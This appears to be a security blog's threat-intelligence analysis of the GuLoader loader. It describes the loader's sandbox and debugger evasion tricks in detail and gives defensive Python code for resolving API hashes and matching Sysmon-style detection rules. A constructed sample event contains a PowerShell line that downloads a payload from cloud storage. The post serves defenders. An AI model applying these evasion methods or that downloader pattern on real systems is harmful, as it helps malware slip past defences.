BIPI

GuLoader Demystified: The Shellcode Smuggler Behind Mass Campaigns

Threat Intelligence

GuLoader (sold as CloudEyE) has delivered more malware families than almost any other loader by hiding shellcode in encrypted blobs on Google Drive, OneDrive, and Discord. Its NSIS and VirtualAlloc tricks confound most sandboxes.

By Arjun Raghavan, Security & Systems Lead, BIPI · September 14, 2024 · 9 min read

#guloader #cloudeye #malware-loader #shellcode #obfuscation

GuLoader, first observed in 2019 and sold commercially as CloudEyE by its Italian developers, occupies an unusual position in the malware ecosystem: it is a loader that has been used to deliver almost every major info-stealer and RAT family, including AgentTesla, Remcos, NanoCore, Formbook, and AveMaria. Its selling point is evasion rather than capability: it gets other malware past endpoint defenses with a reliability that pure-play RAT operators cannot match on their own.

NSIS-Based Delivery

Most GuLoader samples arrive as NSIS (Nullsoft Scriptable Install System) executables. NSIS is a legitimate open-source installer framework used by thousands of genuine software products, so antivirus engines cannot simply flag the format without producing enormous false-positive volumes. GuLoader exploits this tolerance by packaging its loader inside an NSIS installer that, when executed, drops a heavily obfuscated VBScript or PowerShell stage from the installer's compressed data block and runs it through the matching script host.

  • Outer container: NSIS .exe, legitimate file format, low AV detection rate
  • Extracted component: VBScript or PowerShell with heavy string obfuscation
  • Script function: download encrypted shellcode blob from cloud storage URL
  • Cloud storage used: Google Drive, OneDrive, Dropbox, Discord CDN (all trusted, often not inspected by proxy)
  • Final stage: shellcode blob decrypted in memory and injected into a legitimate process

VirtualAlloc Obfuscation

GuLoader's shellcode loader uses a series of API calls that are individually legitimate but collectively constitute shellcode injection. The loader calls VirtualAlloc (or, in builds that use direct syscalls, NtAllocateVirtualMemory) to commit a region with PAGE_EXECUTE_READWRITE permissions, decrypts the shellcode blob with XOR or RC4 using a key that is computed at runtime rather than stored as a constant, copies the decrypted shellcode into the allocated region, and then transfers execution with a jmp. The key innovation is that GuLoader generates a unique decryption routine for each build using a metamorphic engine, so static signatures on the decryption stub and on the encrypted shellcode itself are ineffective.

Because the key is computed at runtime rather than stored as a constant, a static unpacker cannot recover the payload from the file alone, and the computation only yields the right key once the loader's environment checks have passed. The binding is necessarily to generic properties of a real workstation (core count, timing behaviour, absence of hypervisor and debugger artifacts) rather than to a specific hostname or user SID: a loader sold for mass campaigns has to run on thousands of unknown machines. In a sandbox the checks fail, the decrypted buffer is garbage or the loader exits before using it, and cloud sandbox analysis stalls unless the sandbox presents a convincing physical-machine profile.

Anti-Analysis Techniques

  1. CPUID checks: reads the hypervisor-present bit (CPUID leaf 1, ECX bit 31) and the reported core count (sandboxes often expose 1-2 cores; real workstations typically have 4+)
  2. Timing checks: reads GetTickCount (or RDTSC) before and after a busy-wait loop; if the elapsed time is implausibly small (sleep acceleration) or large (single-stepping), a sandbox is assumed
  3. Debugger detection: checks PEB fields (BeingDebugged, NtGlobalFlag) and IsDebuggerPresent, and catches hardware breakpoints by inspecting the debug registers (DR0-DR7) from an exception handler
  4. Environment binding: computes the decryption key at runtime from the outcome of its environment checks, so decryption yields garbage on a host that looks like an analysis VM
  5. API hashing: resolves Windows API functions by hash rather than name, so neither the import table nor the string table reveals which APIs the loader uses
  6. Direct syscalls: issues NT system calls from inline assembly with the syscall number, bypassing the user-mode hooks EDR places in ntdll

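API hashing (item 5) is worth seeing from both sides, because the analyst's counter is mechanical once the hash function is known. The block below is an added example in Python, not GuLoader's code: it implements the ROR-13 hash that many shellcode loaders use (GuLoader's own per-build routine differs and is not reproduced here), builds a hash-to-name table from a constructed export list standing in for a dump of kernel32/ntdll exports, and then scans a constructed shellcode fragment for embedded hash immediates. The opcode bytes in the fragment are illustrative, not real GuLoader bytes.

```python
# Added example (Python, not GuLoader's own code): how API hashing works and how
# an analyst undoes it. The hash is the ROR-13 scheme common in shellcode
# loaders (Metasploit block_api style); GuLoader's per-build routine differs and
# is NOT reproduced here. The export list and shellcode bytes are constructed.
import struct
from typing import Dict, Iterable, List, Tuple

MASK32 = 0xFFFFFFFF


def ror13_hash(name: str) -> int:
    """Rotate-right-13-and-add over the ASCII name, including the terminating
    NUL, which is what the common shellcode implementation does."""
    h = 0
    for ch in name.encode("ascii") + b"\x00":
        h = ((h >> 13) | (h << 19)) & MASK32   # ROR 13 on a 32-bit register
        h = (h + ch) & MASK32
    return h


# Constructed stand-in for the export tables an analyst would dump from
# kernel32.dll and ntdll.dll (e.g. with pefile) and feed into the lookup.
KNOWN_EXPORTS = [
    "VirtualAlloc", "VirtualProtect", "CreateThread", "LoadLibraryA",
    "GetProcAddress", "NtAllocateVirtualMemory", "NtProtectVirtualMemory",
    "NtCreateThreadEx", "IsDebuggerPresent", "GetTickCount",
]


def build_lookup(names: Iterable[str]) -> Dict[int, str]:
    """Precompute hash -> name so a constant found in shellcode resolves instantly."""
    return {ror13_hash(n): n for n in names}


def scan_for_api_hashes(blob: bytes, table: Dict[int, str]) -> List[Tuple[int, str]]:
    """Slide a 4-byte window over the shellcode and report every little-endian
    DWORD that matches a known API hash. This is the mirror image of what the
    loader does: it embeds the hash as an immediate instead of the name string."""
    hits = []
    for off in range(len(blob) - 3):
        value = struct.unpack_from("<I", blob, off)[0]
        name = table.get(value)
        if name is not None:
            hits.append((off, name))
    return hits


def constructed_shellcode() -> bytes:
    """Fake fragment: prologue, pushed hash immediate, indirect call, second hash."""
    return (b"\x55\x8b\xec"                                          # push ebp; mov ebp, esp
            + b"\x68" + struct.pack("<I", ror13_hash("VirtualAlloc"))  # push <hash>
            + b"\xff\xd0"                                            # call eax
            + b"\x68" + struct.pack("<I", ror13_hash("CreateThread")))  # push <hash>


if __name__ == "__main__":
    table = build_lookup(KNOWN_EXPORTS)
    for off, name in scan_for_api_hashes(constructed_shellcode(), table):
        print(f"offset {off:#06x}: {name}")
```

Against a real sample the export list comes from the DLLs the loader walks, the hash function is lifted from the decryption stub (it changes per build, so the table has to be rebuilt per family variant), and the scan runs over the decrypted shellcode rather than the file on disk.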
CloudEyE: The Legitimate Cover

GuLoader's developers market the tool as CloudEyE, a 'legitimate' software protection and distribution service. Their website advertises it as a way to protect intellectual property and distribute software via cloud storage. This creates a legal gray area: the developers have plausible deniability, and because CloudEyE is sold as a service to customers who supply their own payloads, law enforcement cannot simply charge the developers for writing a packer. Law enforcement has investigated, but as of late 2023 the developers remained operational.

  • 2019: GuLoader/CloudEyE first observed in the wild
  • 20+: distinct malware families delivered via GuLoader
  • ~$500: reported GuLoader monthly subscription price
  • 6: major cloud storage providers abused for shellcode hosting

Detection

  • Memory: alert on RWX allocations (VirtualAlloc or NtAllocateVirtualMemory with PAGE_EXECUTE_READWRITE) followed by execution from that region; because GuLoader issues direct syscalls, this needs kernel-side or ETW telemetry, not user-mode API hooks
  • Process: an executable launched from a user-writable path (the NSIS installer) spawning wscript.exe, cscript.exe, powershell.exe, or mshta.exe is anomalous
  • Network: HTTP GET requests to drive.google.com/uc?export=download or 1drv.ms from non-browser processes; without TLS inspection only the destination host is visible, which is still enough to flag wscript.exe or powershell.exe reaching cloud storage
  • Sysmon Event ID 8 (CreateRemoteThread) from an NSIS installer or script host process into another process
  • PowerShell Script Block Logging (Event ID 4104) captures the deobfuscated download URL and the shellcode handling code even when the on-disk script is obfuscated
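The process, network, CreateRemoteThread and Script Block signals above are simple enough to express as rules over Sysmon-style records. The block below is an added example in Python, not BIPI's or any vendor's detection content: it runs those four rules over a constructed event stream that mimics a GuLoader chain (installer in %TEMP% spawning wscript.exe, wscript.exe fetching from drive.google.com, a remote thread into another process, a 4104 script block) mixed with benign noise that must not fire. Field names follow Sysmon (Image, ParentImage, DestinationHostname, SourceImage, TargetImage, ScriptBlockText) but the JSON-lines layout is an assumption, not a real collector format, and the "installer" heuristic (a parent executable in a user-writable directory) is an assumption because logs do not label a process as NSIS. The RWX-memory rule is omitted since it needs kernel or ETW telemetry that Sysmon does not provide.

```python
# Added example (Python): the Detection bullets as rules over constructed
# Sysmon-style JSON lines. Not BIPI's or any vendor's detection content.
# Field names mirror Sysmon; the JSON layout and the sample events are assumptions.
import json
from pathlib import PureWindowsPath
from typing import Dict, List, Tuple

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe", "mshta.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}
CLOUD_HOSTS = {"drive.google.com", "1drv.ms", "onedrive.live.com",
               "cdn.discordapp.com", "dl.dropboxusercontent.com", "www.dropbox.com"}
# Where a mailed NSIS installer actually runs from; standing in for "NSIS parent".
USER_WRITABLE = ("\\temp\\", "\\downloads\\", "\\appdata\\")
# Substrings that show up in the deobfuscated 4104 text of cloud-hosted downloaders.
SCRIPT_IOCS = ("export=download", "1drv.ms", "virtualalloc", "frombase64string")


def exe_name(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def user_writable(path: str) -> bool:
    return any(marker in path.lower() for marker in USER_WRITABLE)


def evaluate(ev: Dict) -> List[Tuple[str, str]]:
    """Return (rule, detail) pairs fired by one event; rules map to the bullets above."""
    hits: List[Tuple[str, str]] = []
    eid = ev["EventID"]
    if eid == 1:  # process creation
        parent, child = ev["ParentImage"], ev["Image"]
        if exe_name(child) in SCRIPT_HOSTS and user_writable(parent):
            hits.append(("script-host-from-installer", f"{exe_name(parent)} -> {exe_name(child)}"))
    elif eid == 3:  # network connection
        host = ev["DestinationHostname"].lower()
        if host in CLOUD_HOSTS and exe_name(ev["Image"]) not in BROWSERS:
            hits.append(("cloud-fetch-non-browser", f"{exe_name(ev['Image'])} -> {host}"))
    elif eid == 8:  # CreateRemoteThread
        src = ev["SourceImage"]
        if exe_name(src) in SCRIPT_HOSTS or user_writable(src):
            hits.append(("remote-thread-from-script-host", f"{exe_name(src)} -> {exe_name(ev['TargetImage'])}"))
    elif eid == 4104:  # PowerShell script block
        text = ev["ScriptBlockText"].lower()
        found = [ioc for ioc in SCRIPT_IOCS if ioc in text]
        if found:
            hits.append(("scriptblock-downloader", ", ".join(found)))
    return hits


def detect(raw_lines: List[str]) -> List[Tuple[str, str]]:
    return [hit for line in raw_lines for hit in evaluate(json.loads(line))]


# Constructed events: a GuLoader-like chain plus benign noise (events 1, 4 and 7).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Users\bob\AppData\Local\Temp\Invoice_3391.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"},
    {"EventID": 1, "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Users\bob\AppData\Local\Temp\Invoice_3391.exe"},
    {"EventID": 3, "Image": r"C:\Windows\System32\wscript.exe", "DestinationHostname": "drive.google.com"},
    {"EventID": 3, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "DestinationHostname": "drive.google.com"},
    {"EventID": 8, "SourceImage": r"C:\Windows\System32\wscript.exe",
     "TargetImage": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"},
    {"EventID": 4104, "ScriptBlockText": "$b=(New-Object Net.WebClient).DownloadData("
     "'https://drive.google.com/uc?export=download&id=EXAMPLEID');$k=[Convert]::FromBase64String($x)"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe"},
]
SAMPLE_LINES = [json.dumps(e) for e in SAMPLE_EVENTS]

if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_LINES):
        print(f"{rule}: {detail}")
```

In production the user-writable-parent heuristic is noisy on its own (plenty of legitimate installers spawn PowerShell), so correlate the four rules by process GUID within a short window; a single process tree that trips the installer-to-script-host rule and then the cloud fetch is a much stronger signal than either alone.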

Remediation

  1. Enable TLS inspection for cloud storage domains (Google Drive, OneDrive, Dropbox, Discord CDN) in your web proxy so the download path, not just the host, is visible
  2. Block downloads from cloud storage domains at the proxy layer when the request carries a non-browser user agent
  3. Enable ETW-based memory execution tracing in your EDR and alert on execute-from-heap patterns
  4. Turn on PowerShell Script Block Logging, and restrict or log Windows Script Host: AMSI-integrated AV records VBScript content, and where scripts are not needed WSH can be disabled via the Windows Script Host\Settings\Enabled registry value
  5. Block unsigned NSIS installers with AppLocker or WDAC (prefer these over legacy Software Restriction Policies), allowing only publishers whose certificates are on your allowlist
